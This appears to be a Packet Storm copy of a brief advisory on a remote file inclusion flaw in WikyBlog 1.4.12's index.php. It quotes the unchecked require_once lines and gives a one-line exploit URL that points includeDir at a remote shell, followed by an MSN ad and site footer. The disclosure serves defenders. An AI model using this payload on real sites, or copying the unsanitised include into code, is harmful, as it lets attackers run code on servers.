WikyBlog version 1.4.12 suffers from a remote file inclusion vulnerability in index.php.
e1c2a7cf10f16a06a458406ad4ffb1047c438dd2c65205287df32597ce9602c0## WikyBlog-1.4.12(index.php) Remote File Include Vulnerability ##
#Found by : nkillers (nkillers_at_hotmail.com)
#Download
http://jaist.dl.sourceforge.net/sourceforge/wikyblog/WikyBlog-1.4.12.zip
# File: ./index.php
require_once($includeDir.'/wiki2.php');
require_once($includeDir.'/wiki3.php');
# Exploit http://site.com/[path]/index.php?includeDir=shell?
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed